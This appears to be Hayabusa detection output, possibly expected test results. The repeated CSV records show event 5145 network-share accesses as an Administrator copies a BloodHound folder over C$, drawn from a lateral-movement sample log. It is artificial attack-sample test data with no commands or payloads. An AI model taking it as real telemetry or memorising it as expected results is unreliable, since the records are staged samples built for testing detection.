+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
